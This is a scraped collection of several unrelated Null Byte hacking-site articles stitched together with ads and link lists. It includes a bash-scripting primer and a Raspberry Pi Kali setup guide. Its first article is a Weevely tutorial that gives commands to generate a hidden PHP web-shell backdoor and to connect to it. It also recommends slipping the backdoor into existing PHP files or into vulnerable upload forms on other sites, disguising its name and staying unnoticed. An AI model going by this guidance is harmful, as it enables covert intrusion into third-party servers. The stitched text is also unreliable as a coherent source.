hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedTypoGuy Explaining Anonymity:A Hackers MindsetNews:'Turkish Crime Family' Demands $75,000 in Bitcoin from Apple in Exchange for Hacked iPhone AccountsAdvice from a Real Hacker:How to Create Stronger PasswordsNews:How to Study for the White Hat Hacker Associate Certification (CWA)News:Apple Says iPhone & iCloud Are Safe After Claimed Breach by 'Turkish Crime Family'How To:The Five Phases of HackingNews:8 Tips for Creating Strong, Unbreakable PasswordsAdvice from a Real Hacker:How to Protect Yourself from Being HackedHow To:Secure Your Instagram Account by Adding 2-Factor Authentication & Managing Privacy SettingsBecome an Elite Hacker, Part 1:Getting StartedWhite Hat Hacking:Hack the Pentagon?News:The Hacking of Blackhat, the MovieHow To:The Essential Skills to Becoming a Master HackerHow to Hack Like a Pro:Getting Started with MetasploitA Hackers Advice & Tip:Choosing Your Path. Knowing Where to Learn & How to Learn It **Newbies Please Read**How To:Keeping Your Hacking Identity Secret: How to Become a Ghost Hacker #3News:Funniest Hacks in HistoryThe Sony Hack:Thoughts & Observations from a Real HackerGoodnight Byte:HackThisSite, Realistic 3 - Real Hacking SimulationsHow To:How Hackers Take Your Encrypted Passwords & Crack ThemNews:Anonymous Hackers Replace Police Supplier Website With β€˜Tribute to Jeremy HammNews:Student Sentenced to 8mo. in Jail for Hacking FacebookGoodnight Byte:HackThisSite Walkthrough, Part 9 - Legal Hacker TrainingHow To:Conceal a USB Flash Drive in Everyday ItemsCommunity Byte:HackThisSite, Realistic 3 - Real Hacking SimulationsNews:More Jackass on MOVIESNews:TOON BUILDSGoodnight Byte:HackThisSite Walkthrough, Part 6 - Legal Hacker TrainingGoodnight Byte:HackThisSite, Realistic 2 - Real Hacking SimulationsCommunity Byte:HackThisSite Walkthrough, Part 6 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 5 - Legal Hacker TrainingCommunity Byte:HackThisSite, Realistic 2 - Real Hacking SimulationsCommunity Byte:HackThisSite Walkthrough, Part 10 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 10 - Legal Hacker TrainingHow To:How Hackers Use Your IP Address to Hack Your Computer & How to Stop ItNews:Indie and Mainstream Online Games Shut Down by LulzSecCommunity Byte:HackThisSite, Realistic 5 - Real Hacking SimulationsCommunity Byte:HackThisSite, Realistic 4 - Real Hacking SimulationsCommunity Byte:HackThisSite, Realistic 1 - Real Hacking SimulationsGoodnight Byte:HackThisSite Walkthrough, Part 7 - Legal Hacker
How to Slip a Backdoor into PHP Websites with Weevely Β« Null Byte :: WonderHowTo
Backdoors are convenient to leave behindonce you've already found a way into a server, and they can come in handy for a variety of reasons. They're good for developers who want a quick way into machines they're working on, or for systems administrators who want similar access. Of course, backdoors are also a hacker's best friend, and can be added in a variety of ways. One good tool for doing this is Weevely, which uses a snippet of PHP code.Weevely will create a terminal on the target server and allow for remote code actions via a small footprint PHP agent. It includes more than 30 modules for administration and maintenance needs, as well as privilege escalation and even network lateral movement. Think of those hosting accounts you use that lock down your accessβ€”this can come in handy there, as well as on other servers you've successfully infiltrated.In this guide, we'll be taking it for a spin on our localhost. You can follow along, or you can get it running on another server where you can do a lot more with it.Step 1: Download WeevelyWeevely can be found built into some Linux distributions, such as Kali. If it's not installed in your Linux system, you can find version 3 onEpinna's GitHub page. To get it installed on a standard Linux distro, there are a variety of ways you can acquire it, includingGit, HTTP, and wget.Download the Git file:https://github.com/epinna/weevely3.gitDownload via HTTP right now in your browser:https://github.com/epinna/weevely3/archive/master.zipDownload via wget (in your terminal):wgethttps://github.com/epinna/weevely3/archive/master.zipIf you're running Kali, you can skip this step, obviously.Step 2: Create the PHP SnippetNo matter how you've grabbed the Weevely download above, make sure you have a terminal or shell window open in the directory containing thatmaster.zipfile. Assuming you've downloaded it to your Downloads folder, let's go there, unzip the file, change into that unzipped folder location, and do a quick listing to check out the files.cd Downloadsunzip master.zipcd weevely3-master/lsYou should run theweevely.pyset-up file alone to get an idea what's going on here, because the script requires specific syntax, and you can learn about it here../weevely.pyFor our example, we'll be using the "Generate backdoor agent" option. Let's make our passwordpazzWurD, and call our PHP file pathbackdoor.php. We should end up with a file calledbackdoor.phpin the same directory where we're working.Please note that backdoor.php isnot a good namefor your PHP file. This is just an example. You don't want to draw too much attention to what you're doing, so make sure to replace both "mypassword" and "myfilename.php" below with something less obvious../weevely.py generate mypassword myfilename.phpStep 3: Slip in Your BackdoorArmed with this new PHP script (backdoor.php, in our case), we can now consider a few ways that we can use it. First, if you have access to a server, you can simply copy/paste the contents of your PHP file into another accessible PHP file on the server. For example, aconfig.phporsettings.phpfile that might be found there. First, I'll copy the contents of mybackdoor.phpscript with a text editor.Then, I'll paste that entire block of PHP code below all the other PHP code on a file running on my server. Here, I'm pasting it below everything in my server'sinfo.phpfile. I had to use the Vi editor on my server, but if you're little rusty on Vi/Vim, there's a guide here on Null Byte that can help you out:Don't Miss:An Intro to Vim, the Unix Text Editor Every Hacker Should Be Familiar WithMy info.php will still work as usual, but the script below will remain quite until called upon.Another thing you might try is to find a vulnerable website with upload abilitiesβ€”the kind that lets you share a file or image. Do that, get the link to your file, and you're in business.Most sites like this will block uploads of scripts, but not every site is perfect.Any way you do it, you want to get yourbackdoor.phpfileβ€”or the contents of your PHP fileβ€”into some other PHP file, on some local or remote server. Once you've done that, it's time to call on it.Step 4: Access Your BackdoorThe first thing about Weevely that you may notice is that yourbackdoor.phpfile running in the web directory, or on the tail end of some other PHP file, doesn't do or show anything in your web browser. That's good! Were this showing up on a site, it would be discovered right away and patched, or possibly exploited by someone else, and we don't want that.Nothing shows at the bottom of my info.php file, which is what we want.What we want to do is openweevely.pyon our system again, only this time we're not going to create a file with itβ€”we're going to use it to target the place we put the script that we already created. On my localhost server, with my file, this means:./weevely.py http://localhost/info.php pazzWurDIf you're not testing this out with localhost, it'd be something more like:./weevely.pyhttp://some.websitename.com/myfilename.phpmypasswordEither way, use Weevely to call out your file and you might see it answering:Sing with me... "I've Got the Power!"Simply typing:helpat this point will show you all the things you're able to try right out of the box.Weevely has more than 30 modules built in, so there's a lot to work with here. For example,file_lsdoes exactly what you'd think, andfile_cpmight let you copy a file as long as you have worked out yourfromandtopaths just like on a local system. You might be able to grab a whole lot at once withfile_tar, then usecpto have a lot of reading.There are ways to elevate your rights from within Weevely, so if you have elevated rights on the server, you can do basically everything with it. You might be able to get a few clues on your target system withaudit_password. Just remember to stay on the down-low here, to both save yourself time and effort if you're messing with your own system, and to remain quiet if on other systems.TroubleshootingDid you run into any errors during this exercise? I'm running on a new system that's a bit bare-boned, so while I was able to unzip the master.zip directory and see the files it contained, I was not initially able to get Weevely's Python script to run correctly.So if you run into the same issue and see something like this:ImportError: No module named prettytableJust run something like this, replacing the module name with whatever one is missing:$ sudo apt install python-prettytableIf you have any more issues running this script as a backdoor, let me know in the comments below, and I'll see what I can do.Don't Miss:How to Create a Nearly Undetectable Backdoor with CryptcatFollow Null Byte onTwitterandGoogle+Follow WonderHowTo onFacebook,Twitter,Pinterest, andGoogle+Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover photo and screenshots by EvilToddler/Null ByteRelatedHIOB:WebSite Hacking Series Part 2: Hacking WebSites Using The DotNetNuke VulnerabilityHow To:SQL Injection Finding Vulnerable Websites..How To:Use PHP to design and make cool websitesHow To:Develop a social networking community website with PHP, MySQL & ActionScript 3News:What REALLY Happened with the Juniper Networks Hack?PHP for Hackers:Part 1, Introduction and Setting UpHow To:Successfully Hack a Website in 2016!Hacking macOS:How to Automate Screenshot Exfiltration from a Backdoored MacBookHow To:Use HipHop for PHP to improve website performanceHow To:Write an XSS Cookie Stealer in JavaScript to Steal PasswordsSocial Engineering, Part 2:Hacking a Friend's Facebook PasswordNews:Links for Gifts and Building RequestsHow To:How Cross-Site Scripting (XSS) Attacks Sneak into Unprotected Websites (Plus: How to Block Them)News:Nursery Barn ExpansionNews:Super Mega Slip N' Slide!How To:Advanced Social Engineering, Part 2: Hack Google Accounts with a Google Translator ExploitHow Null Byte Injections Work:A History of Our NamesakeNews:FarmVille Orchard and Tree Gifting LinksNews:Dirt DiverNews:SlipKnot and Incorrect Foundation Chain CountGoodnight Byte:HackThisSite, Realistic 4 - Real Hacking SimulationsStock Photo Challenge:Animal Totem PoleStock Photo Challenge:Baby DollNews:addd meee
Don't Be a Script-Kiddie part1: Introduction to Shell Script Β« Null Byte :: WonderHowTo
Hello my anxious hackers, the week has started and here we begin a new series that I think will help many here and not only, for those that have the opportunity to follow our tutorials but they are not yet part of the community.Don't be a script-kid? what do you mean?In programming and hacking culture a script kiddie or skiddie1 (also known as skid is an unskilled individual who uses scripts or programs developed by others to attack computer systems and networks, and deface websites without knowing how the programs work, it has nothing to do with newbie or amateurs, skrip kids are just dumb and lazies, different from amateur and newbies they don't want to learn, they can spend months, and even years claiming that they are hackers without learning nothing, just by using others tools, without helping the community you can not consider your self a real hacker, so stop using tools without understanding what is going on behind it, plus most of the tools are open source, our kali linux as well, so start exploring what is inside it, change the code, innovate a tool, report a bug, write a tutorial, learn a programming or script language, do something useful.Are you a newbie?don't feel bad if you haven't done anything, if you are reading this means you want to learn and not wasting your time by using tools you don't understand, so i got your back now.what we can expect from this serie?1-understanding how some tools on kali linux work.2-Be able to modify some tools inside kali linux.3- write our own tool and share for everyone here on null-byte.What are we going to learn today?1-Basic understanding of shell,bash and terminal2-Some useful commands for linux3-writing our own shell script(bash)4-executing our shell script4-Understanding how Kali linux commands works5-executing our script without "./"6-Leave yours comments1-SHELL,BASH,TERMINALIm really sorry but i wanna be more practical in this lessonso here we got some quick notes about them.shell - shell is a user interface for access to an operating system's services. In general, operating system shells use either a command-line interface (CLI) or graphical user interface (GUI), depending on a computer's role and particular operation.bash -Bash is a command processor that typically runs in a text window, where the user types commands that cause actions. Bash can also read commands from a file, called a script. Like all Unix shells, it supports filename globbing (wildcard matching), piping, here documents, command substitution, variables and control structures for condition-testing and iteration. The keywords, syntax and other basic features of the language were all copied from sh. Other features, e.g., history, were copied from csh and ksh. Bash is a POSIX shell, but with a number of extensions.terminal -It's a program called a terminal emulator. This is a program that opens a window and lets you interact with the shell. There are a bunch of different terminal emulators you can use. Most Linux distributions supply several.2-USEFUL COMMANDS ON LINUXNow fire up your kali linux and open your terminalwe will talk about the commands we will use in this lessonlsLists the contents of a directorypwdwrites the full pathname of the current working directory to the standard output.cdThe cd command, also known as chdir (change directory), is a command-line OS shell command used to change the current working directory in operating systemsmkdirThe mkdir (make directory) command in the Unixcpcp is a UNIX command for copying files and directoriesrmis a basic UNIX command used to remove objects such as files, directories, device nodes, symbolic links, and so on from the filesystemchmodchmod - modify file access rightsfor now thats all if i forget to explain a command during our tutorial just google it and try to understand why i used it, its also one of step of stop being a script kid, you need to find the "because" of "why" by your own sometimes.3-WRITING OUR "hello planet" SHELL SCRIPTjust open your text editor and write the code in the picture below, i wont paste here the code to eliminate the habit of copy and paste, its better when you write by yourself.i will be using leafpad you can use any other.. so after you finish writing save it as hello_sell.shUnderstanding the scriptThe line 1 of the script is important. This is a special clue, called a shebang, given to the shell indicating what program is used to interpret the script. In this case, it is /bin/bash. Other scripting languages such as Perl, awk, tcl, Tk, and python also use this mechanismThe lines 2,3,4,5,6 are comments. Everything that appears after a "#" symbol is ignored by bashthe line 7 is the echo command. This command simply prints its arguments on the displayRUNNING OUR SCRIPTNow go to the folder where you saved your file, mine i did save in Desktop,using the cd command that i explained above, i went to the desktop folder and tried to executed our script but we got one of my favorite error msg"permission denied" what does it means?it means that we dont have rights to execute this file, so we can again use one of the above commands to give us rights to execute this script, so we will be using the "chmod with the +x options"and after that our script will be execute normally as in the picture belowwow congratulation bro/sister, you are no longer a script kid, you just run your first own tool, actually in the real world we will not consider it a real tool, but you are getting it, you made your own virtual printer "lol i don't even know if i can say that" but anyway you got it.4- Understanding how Kali linux commands worksok now comes the funnier part of this lessonjust type again null__byte.sh or even without the "./"ooops "another error" command not found, and this is where a lot of script kiddies will stop, a lot of times i see people here on nullbyte posting tutorials with new tools, a script-kid download it then run it with "./" even after years he/she can not understand what is going on behind, why for tools like "nmap,msfconsole,nikto" i dont need to type with the "./" and specify the full path of where the tool is located? Dont panic i got your back, first of open your bin folder in kali linux,you could also go there by terminal typing : cd/binIn case you are in the root directory, but i want you to have also a graphical look of it, we can see that there are some files of commands we often use in kali linux such as "cp"echo"dir"chmod"dd" and so on.so why nullbyte did not work without the "./"?When you type in the name of a command, the system does not search the entire computer to find where the program is located. you have noticed that you don't usually have to specify a complete path name to the program you want to run, the shell just seems to know.what happen is that the shell does know. Here's how: the shell maintains a list of directories where executable files (programs) are kept, and only searches the directories in that list. If it does not find the program after searching each directory in the list, it will issue the famous command not found error message.This list of directories is called your path. You can view the list of directories with the following command:echo $PATHas we can see from the above pic these are our path where we can place our script, the system will search for scripts inside this folder when we type a command without "./"note: the path terminate where the new":" starts, so i got the following paths "/usr/local/sbin""usr/local/bin"and i guess now you got where i got the other paths.ok now lets do something very cool, first of copy your file to one of the paths listed above, i will use the first one "usr/local/sbin"so as i explained above the command to copy is the cp, so lets run itcp null_byte.sh /usr/local/sbinnow run again our script without the "./"nullbyte.shWow we got our script working without the "./",cool but another cool thing you could do also is to run the script without the ".sh".To do this simply save your script again without ".sh" and copy to your path (I guess now you have an idea where is your path), give the permissions and run it again without ".sh".Bingo, you just got it running like any other tool inside kali linuxOk for now you can say that you are not script kid anymore, you start to understand how stuffs work inside kali linux ,and today you have made your own tool"virtual printer ", but professionals do not advice you to proceed this way to run your scripts when you want to run it without specifying the full path and run it with the annoying "./ and .extension" so we have another trick.A better way would be to edit your .bashprofile to add our bin path, so for this we will need to create our own bin folder somewhere else where we can put our own scripts, so that would be easy to control or manage our script than messing it with system scripts and so on, so lets first create our bin folder, then copy our script to this folderok now remove the file from /usr/local/sbin path, (yes i know we could just use move, but i want you to explore more commands)restart the terminal and run null_byte(oops the same error" command not found") why?Because we did not tell the system about our new bin folderSo lets edit our bashprofile and tell the system where to look for our scripts.on kali lnux just run the following command(in case you are using leafpad too) :leafpad ~/.bashrcand add the following:export PATH=$:/root/Desktop/binsave it, restart your terminal and then run it again from anywhere without "./" and .shBingo we got it... our script is running from anywhere in kali linux without the "./" and the ".extension", so for now when someone post a tutorial here and he/she uses a tool that is not by default in kali linux instead of specifying the whole path try to bring them to your bin folder, and run it just like any other tool..and remember don't just copy and paste, don't run tools without the understanding of what is going on behind it, for now that is all, leave your comments below if i miss something or if i said something wrong.. see you in the next lesson...Hacked by Mr__Nakup3ndaWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedDon't Be a Script-Kiddie part2:Building an Auto-Exploiter Bash ScriptNews:Simple Man-in-the-Middle Script: For Script KiddiesHow To:Build an Evasive Shell in Python, Part 4: Testing the ShellHack Like a Pro:Scripting for the Aspiring Hacker, Part 1 (BASH Basics)How To:Reverse Shell Using PythonHow To:Create a Persistent Back Door in Android Using Kali Linux:How To:Find & Exploit SUID Binaries with SUID3NUMHack Like a Pro:Perl Scripting for the Aspiring Hacker, Part 1How To:Use LinEnum to Identify Potential Privilege Escalation VectorsHow To:Build an Evasive Shell in Python, Part 3: Building the Attacker ScriptHow To:Bash (Shell) Scripting for BeginnersHow To:Screenplay Format Guide (PDF)How To:Script Writing Basics How to Structure a Film Script lNews:BBC Writer's RoomHow To:Start With Site Setting For Snoft Article Directory ScriptNews:Must-See Interview w/ Harris Savides ASCForbes Exploited:XSS Vulnerabilities Allow Phishers to Hijack Sessions & Steal LoginsHow To:How Cross-Site Scripting (XSS) Attacks Sneak into Unprotected Websites (Plus: How to Block Them)How To:Automatically Organize Your Torrents with Batch ScriptingNews:The Money Making MacroNews:The Best Films from MiramaxHow To:Push and Pull Remote Files Securely Over SSH with PipesNews:SOPA and PIPA Blackout!
How to Build a Beginner Hacking Kit with the Raspberry Pi 3 Model B+ Β« Null Byte :: WonderHowTo
If you want to follow Null Byte tutorials and try outKali Linux, theRaspberry Piis a perfect way to start. In 2018, theRaspberry Pi 3 Model B+was released featuring a better CPU, Wi-Fi, Bluetooth, and Ethernet built in. Our recommended Kali Pi kit for beginners learning ethical hacking on a budget runs the "Re4son" Kali kernel and includes a compatible wireless network adapter and a USB Rubber Ducky.You should be using a system separate from your day-to-day computer for testing out hacking tools and downloading hacking software, and a Raspberry Pi brings the price of keeping your hacking endeavors siloed from your personal computer down to between $45 to $50. While the Pi is small, it's powerful, and can be used to follow the majority of the tutorials on Null Byte.Image by Kody/Null ByteWhy Use a Raspberry Pi to Learn HackingThe Raspberry Pi has a lot of fans, which means a lot of support for beginners. Aside from security professionals and hackers using it to run Kali Linux, many developers use the Pi for scientific and industrial applications. While the original Pi was made to introduce schoolchildren to programming, today's Raspberry Pi is capable of some truly amazing things with the right accessories and creativity. For building a prototype cyberweapon, the Raspberry Pi has been the foundation for proof of concept attacks ranging from drone takeovers to mass Wi-Fi jamming.The Pi's small size and ability to do some powerful things have also seen it featured in shows likeMr. Robot, where it's used toremotely hack into the climate control system of a data center. That being said, it's not a supercomputer, so it's important to set your expectations for this tiny, discreet computer. Things likebrute-force crackingwon't be practical on the Pi except for the most simple of lists, but most of this work can be outsourced to the cloud in a real-world attack.Image by Kody/Null ByteLearning on the Raspberry Pi means you're not just tied to the Kali Linux operating system. In fact, projects likeBerryBootenable you to have an SD card with many operating systems for the Pi stored on it, allowing you to mount whichever OS you want to work with. This means you can have a Pi act as both a hacking workstation and adeliberately vulnerable serverto attack just by rebooting the system and selecting a different disk image.Don't Miss:How to Create a Wireless Spy Camera Using a Raspberry PiThe Raspberry Pi also runs Raspbian, the official OS of the Raspberry Pi. This Debian-based OS can also be used tolearn basic Linuxand hacking tools, although it requires much more customization before it's suitable for this. If you're stuck learning aboutsoftware-defined radioor NFC in Kali Linux on the Pi, sometimes switching to Raspbian can get all the hardware to work together when all else fails.Using the Pi 3 Model B+ for HackingThanks to the Re4son kernel, the improved specs and updated networking performance can be used with the hacking tools Kali has to offer. The new Pi features a 10/100/1000 Gigabit LAN controller, as well as dramatically improved Wi-Fi speeds, making the Pi ideal for networking applications like running a static web server, NAS, or proxy server. It also makes it an ideal platform forWi-Fiand network hacking, making the Pi much more versatile in a pentesting kit.In addition to the networking improvements, the Pi 3 Model B+ enjoys a 16.7% processing speed increase from the previous model, running a 1.4 GHz 64-bit quad-core processor. While this performance increase isn't enough to bring the Pi into the realm of most desktop or laptop computers, the increase does make Kali feel more responsive.Image by Kody/Null ByteLike theprevious KaliPi builds, it's easy to get started using your Pi once you've booted Kali for the first time. You can plug your Pi into an available screen via HDMI, or you can connect to your Piwithout a screen via SSHover an Ethernet or Wi-Fi connection. Adding a battery pack can give you access to a Kali Linx system anywhere, allowing you to connect to your Pi from a laptop or smartphone over your home Wi-Fi network or cell phone's data hotspot.Why We're Using the Re4son KernelWhile the new Raspberry Pi comes with Bluetooth, Wi-Fi, and other options that can be used with Kali Linux, getting them working isn't always straightforward. We found many beginners had trouble setting up the Bluetooth on the Pi to work with tools in Kali. To fix this, we looked to the Re4son kernel, a special version of Kali Linux optimized for the Raspberry Pi. This version of Kali was working on the Raspberry Pi 3 Model B+ before an official release was availible from Offensive Security (it still is not as of this writing).Image by Kody/Null ByteAnother issue the Re4son kernel fixes is the ability to log in upon startup. In order to power up your Pi and log in while on the go, you'll need your Pi to be able to start Kali Linux and join a familliar Wi-Fi network. After doing so, you can log into the Pi via SSH from any device on the same network. This doesn't work, however, if the Pi gets stuck on the login screen that requests your username and password when Kali starts. Ourprevious solutionfor this was a little complicated and some readers had a hard time following the steps, so I'm pleased that in this version, our Pi image comes with a setup scrip that takes care of enabling this for us.Reccomended Hacking Kit for BeginnersTo get started with the Raspberry Pi as a hacking platform, you'll need a few key components to get the Pi up and running. Initially, you'll need access to another computer to burn your Kali image to an SD card.Aside fromthe Pi 3 B+ itself($36.97), a good power adapter is necessary to power the Pi. The Pi takes a microUSB power cord, and theCanaKit beginner kit version($52.99) of the Pi includes an appropriate adapter. In general, a dedicated 2.4-amp power supply is the best way to go.Next, you'll need an SD card to put the operating system on. There are a lot of available options, but you should opt for a faster SD card with 16 GB of space. In particular, we recommendSanDisk Extreme($17.91 for 64 GB) or theSanDisk Extreme Plus($22.99 for 32 GB). You can get away with 8 GB, but things will be tight.To interact with the Pi, you'll need a keyboard and mouse. It's easiest to use a wireless keyboard and mouse combination like theRii 2.4G Mini Wireless Keyboard with Mouse Touchpad Remote Control($16.99), since we recommend avoiding Bluetooth versions at all cost. They do not work well with Kali and take forever to configure.Image by Kody/Null ByteTo get started withWi-Fi hacking, you'll need a Kali-compatiblewireless network adapter. After testing many, we were pleased with the performance of Panda Wireless network adapters, in particular, because of their small size and 2.4/5 GHz capabilities. For discreet Wi-Fi hacking, we recommend thePAU05 for 2.4 GHz($13.99) or thePAU07 for 2.5 and 5 GHz($24.99). If you want to connect a directional or high-gain antenna to the adapter,the PAU06($14.99) is great for 2.4 GHz hacking, while thePAU09($34.99) is a powerful dual-band adapter with two swappable antennas.Finally, we recommend beginners include aHak5 USB Rubber Duckyrunning theTwin Duck firmware. The Twin Duck firmware allows us to mount the Rubber Ducky as USB mass storage, which means we can write and encode Ducky Script on our Pi with the Rubber Ducky plugged in. While the Rubber Ducky doesn't ship with the Twin Duck firmware, it caneasily be flashed.More Info:How to Modify the USB Rubber Ducky with Custom FirmwareImage by Kody/Null ByteStep 1: Download & Flash Kali Linux to the SD CardThe SD card is the brain of your Pi, so you'll need to download Kali Linux to load it on the card. Navigate toRe4son's website, where you'll find the Kali Linux download in a compressed file. Make sure to select the version for the Raspberry Pi 3 B+ model.The file we're looking for is the top link.If you use Windows, you can useWin32 Disk Imagerto put your image on the card. On a Mac, you can use a tool likeApplePiBakerorEtcherto load your Kali image onto your SD card. In our video guide above, we went with Etcher since it's the easiest method. If this causes errors for you, you can also write a bootable SD image is via a terminal using the below instructions.On a Mac, before plugging in your SD card, run the following in a terminal:df -hThis will display a list of all the disks attached to your system. Attach your SD card and run the command again, and note the filesystem name of your SD card (it's the one that wasn't there before). It should look like "/dev/disk2s1," and you should be very careful not to mix this up in the next steps since doing so could overwrite your hard drive.Now we'll use theddcommand to load the Kali image onto the card. First, let's unmount the partition so you can write to it with the following command, withXbeing the correct disk number:sudo diskutil unmount /dev/diskXNext, run the following command to load the image onto the SD card. If there is an "s" after the initial disk number (like rdisk2s1), do not include the "s" or following number. So, "rdisk2s1" should look like "rdisk2." Here's what it should look like all together:sudo dd bs=1m if=LocationOfKaliImage of=/dev/rdiskXPress enter to begin the process and note thatdddoes not provide any on-screen information unless there is an error or it finishes. To view the progress during the transfer, you can hitCtrl-T. Wait for the process to complete. You'll know the process is complete when you see a readout of bytes transferred over the time the process ran.Step 2: Load Up Kali Linux & UpdateOnce Kali Linux loads, you should see a login screen. The default credentials arerootfor login andtoorfor the password. When Kali loads, open a terminal window. First, we'll need to change the default password so we have some level of control over who accesses our device. To do so, typepasswd rootinto the terminal window and enter your new password twice to set it.Don't Miss:How to Turn Your Raspberry Pi into a Wireless HotspotNext, you'll need to update the system. Now is when you'll need to connect your Pi to the internet via an Ethernet cable or by clicking the Wi-Fi icon in the top-right corner and selecting a network with internet access. In a terminal window, type the followingapt-getcommands, allowing each command to complete before starting the next. This may take some time.apt-get updateapt-get upgradeapt-get dist-upgradeYou should see some output like below. After all this finishes updating, we'll be ready to start configuring our Raspberry Pi.Step 3: Enable BluetoothTo enable Bluetooth, we can use the handy Bluetoothctl built into our Re4son Kali. To use it, typebluetoothctlinto your terminal window. Next, to turn on the Bluetooth agent, typeagent on. When the agent is registered, typedefault agentto register the default agent and enable the Bluetooth controller.To start a scan for Bluetooth devices, typescan on, and you should see a list of devices begin to populate if there are any Bluetooth devices nearby. Finally, to pair with any devices you see, typepairand then the MAC address of the device you see on the list.Step 4: Change the SSH KeysUsing default SSH keys is bad, and can lead to being the victim of aman-in-the-middle attack. To defend against this, we'll need to change our default SSH keys and enable SSH to run at boot.In your terminal window,cdto the SSH keys and reconfigure the server.cd /etc/ssh/dpkg-reconfigure openssh-serverThis should create new SSH keys. Next, we'll run a few commands to enable runlevels for SSH and allow us to start the service at boot so we can log in remotely.update-rc.d -f ssh removeupdate-rc.d -f ssh defaultsnano /etc/ssh/sshd_configIn the nano window that opens, make sure that "PermitRootLogin" is un-tabbed, as seen in the image below.After this is done, you can hitCtrl-Xto exit the nano window after applying the changes. Next, typesudo service ssh restartto apply these changes. Finally, typeupdate-rc.d -f ssh enable 2 3 4 5to enable SSH at boot with the settings we've applied.Step 5: Enable AutologinIn our last Pi tutorial, enabling autologin to bypass the login prompt was by farthe most annoying step. This time, thankfully, the process couldn't be more simple. This step is critical to use the Pi without a keyboard or screen, as SSH or VNC will not start if the Pi gets stuck at the login screen.To enable autologin, type the following into your terminal window.cd /usr/local/src/re4son-kernel_4*./re4son-pi-tft-setup -a rootYou should see output like below. To apply the changes and boot into your newly configured Pi, typeYto confirm and reboot.Other Pi Projects on Null ByteIf you've got your Pi up and running, there's a lot you can do to get started! Check out some of our other guides on using the Raspberry Pi for hacking on Null Byte.Log into Your Raspberry Pi Using a USB-to-TTL Serial CableUse VNC to Remotely Access Your Raspberry Pi from Other DevicesSet Up a Practice Computer to Kill on a Raspberry Pi 3Build a Pumpkin Pi: The Rogue AP & MitM Framework That Fits in Your PocketWardrive with the Kali Raspberry Pi to Map Wi-Fi DevicesBoot Multiple Operating Systems on the Raspberry Pi with BerryBootAutomate Hacking on the Raspberry Pi with the USB Rubber DuckyImage by Kody/Null ByteI hope you enjoyed this guide to setting up a Raspberry Pi 3 Model B+ running Kali Linux! If you have any questions about this tutorial or the Pi as a hacking platform, feel free to leave a comment or reach me on [email protected] Null Byte onTwitter,Flipboard, andYouTubeFollow WonderHowTo onFacebook,Twitter,Pinterest, andFlipboardWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover photo and screenshots by Kody/Null ByteRelatedHow To:Load Kali Linux on the Raspberry Pi 4 for the Ultimate Miniature Hacking StationHow To:Enable Monitor Mode & Packet Injection on the Raspberry PiHow To:Discover & Attack Raspberry Pis Using Default Credentials with Rpi-hunterRaspberry Pi Alternatives:10 Single-Board Computers Worthy of Hacking Projects Big & SmallHow To:Hack WPA WiFi Passwords by Cracking the WPS PINHow To:Set Up a Headless Raspberry Pi Hacking Platform Running Kali LinuxBuyer's Guide:Top 20 Hacker Holiday Gifts for Christmas 2017How To:Boot Multiple Operating Systems on the Raspberry Pi with BerryBootThe Hacks of Mr. Robot:How to Build a Hacking Raspberry PiHow To:Build a Pumpkin Pi β€” The Rogue AP & MITM Framework That Fits in Your PocketHow To:Build a Portable Pen-Testing Pi BoxOpen Sesame:Make Siri Open Your Garage Door via Raspberry PiRaspberry Pi:Hacking PlatformHow To:Set Up Kali Linux on the New $10 Raspberry Pi Zero WHow To:Log into Your Raspberry Pi Using a USB-to-TTL Serial CableHow To:Automate Hacking on the Raspberry Pi with the USB Rubber DuckyHow To:Share Wi-Fi Adapters Across a Network with Airserv-NgHow To:Hack WiFi Using a WPS Pixie Dust AttackHow To:Lock Down Your DNS with a Pi-Hole to Avoid Trackers, Phishing Sites & MoreHow To:Build an Off-Grid Wi-Fi Voice Communication System with Android & Raspberry PiRaspberry Pi:Physical Backdoor Part 1Buyer's Guide:Top 20 Hacker Holiday Gifts of 2018News:Smart Home Proof of Concept Uses a Raspberry Pi to Control Air Conditioner with HoloLensRasberry Pi:Introduction
How to Get Started Writing Your Own NSE Scripts for Nmap Β« Null Byte :: WonderHowTo
